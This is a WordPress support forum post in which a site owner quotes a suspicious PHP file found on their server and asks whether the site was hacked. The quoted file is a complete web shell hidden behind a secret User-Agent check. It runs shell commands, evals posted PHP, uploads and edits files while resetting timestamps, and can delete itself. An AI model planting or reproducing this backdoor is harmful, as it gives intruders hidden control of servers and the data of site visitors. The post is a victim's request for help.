Quantcast
Channel: WordPress.org Forums » All Topics
Viewing all articles
Browse latest Browse all 59525

Strange file on the server

$
0
0

Replies: 0

Hello,

we are using wordpress an some days ago we found a strange file on our webspace called DNDDWwGCyIsO.php with the following code
`<?php
$ref = $_SERVER[‘HTTP_USER_AGENT’];
$keywordsRegex = “/AtOPvMzpDosdPDlkm3ZmPzxoP/i”;
if (preg_match($keywordsRegex, $ref)) {

if ($_GET[‘kill’]) {

$split = explode(“/”, $_SERVER[‘REQUEST_URI’]);
$shellFile = $split[(count($split) – 1)];
$shellFile = preg_replace(‘/\?.*?$/i’, ”, $shellFile);
unlink($shellFile);
exit ();

}

if( $_POST[‘_dir’] ) { chdir($_POST[‘_dir’]); }
$dir = getcwd() . ‘/’;

if( $_POST[‘_save’] == ‘Save & Close’ ) {

$editFileDate = filemtime($_POST[‘_edit’]);
$editFolderDate = filemtime(‘.’);

$fh = fopen($_POST[‘_edit’], ‘w’);

$stringData = stripslashes($_POST[‘_edittext’]);
$stringData = html_entity_decode($stringData);

fwrite($fh, $stringData);
fclose($fh);

touch($_POST[‘_edit’], $editFileDate);
touch(“.”, $editFolderDate);

$_POST[‘_edit’] = “”;

}

if( $_POST[‘_edit’] ) {
echo ‘<br><form name=”texteditor” method=”post” action=””>
<input type=”hidden” name=”_edit” value=”‘; echo $_POST[‘_edit’]; echo ‘”>
<input type=”hidden” name=”_dir” value=”‘; echo $_POST[‘_dir’]; echo ‘”>
<textarea rows=”30″ cols=160 wrap=”off” name=”_edittext”>’;
$file = fopen($_POST[‘_edit’],”r”);
while(! feof($file)){
//echo fgets($file). “”;
$line = fgets($file);
echo htmlentities($line);
}
fclose($file);
echo ‘</textarea><br/><br/>
<input type=”submit” name=”_save” value=”Save & Close” /></form><br><br>’;
exit ();
}

if ($_POST[‘_evalText’]) eval($_POST[‘_evalText’]);

if( $_POST[‘_upl’] == “Upload” ) { if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ”; } else { echo ”; } }

echo ‘<b><br>’.php_uname().'<br></b>’; echo ‘<form action=”” method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’;
echo “<br><b>Remote Dir: </b><input type=’text’ size=’100′ name=’_dir’ value=’$dir’><br><br>”;
echo ‘<b>Upload: </b><input type=”file” name=”file” size=”50″><input name=”_upl” type=”submit” id=”_upl” value=”Upload”>
<br><br><table>
<td><b>Command:</b> <input type=”text” name=”_cmd” size=”40″><br></td>
<td><b>Edit: </b> <input type=”text” name=”_edit” size=”40″><input name=”_edt” type=”submit” id=”_edtl” value=”Edit”></td></table>’;

if( $_POST[‘_cmd’] ) { $output = shell_exec($_POST[‘_cmd’]); echo ‘<input type=”hidden” name=”output” value=”‘; echo $output; echo ‘”>’; }
echo ‘<table><td>’;
echo ‘<textarea cols=40 rows=20>’;echo $output; echo ‘</textarea><br>’;
echo ‘</td><td>’;
$listDirOutput = shell_exec(“ls -a -F -p”);
echo ‘<textarea cols=40 rows=20>’;echo $listDirOutput; echo ‘</textarea><br>’;
echo ‘</table><br>’;

echo ‘
<textarea rows=”3″ cols=84 wrap=”off” name=”_evalText”></textarea><br/><br/>
<input type=”submit” name=”_save” value=”PHP EVAL” /></form><br><br>
‘;

echo ‘</form>’;
exit();
}
?>

is our site hacked? and how we can fix it?
All Login Data alreay changed

Thank you very much for your help

dsalchow


Viewing all articles
Browse latest Browse all 59525

Trending Articles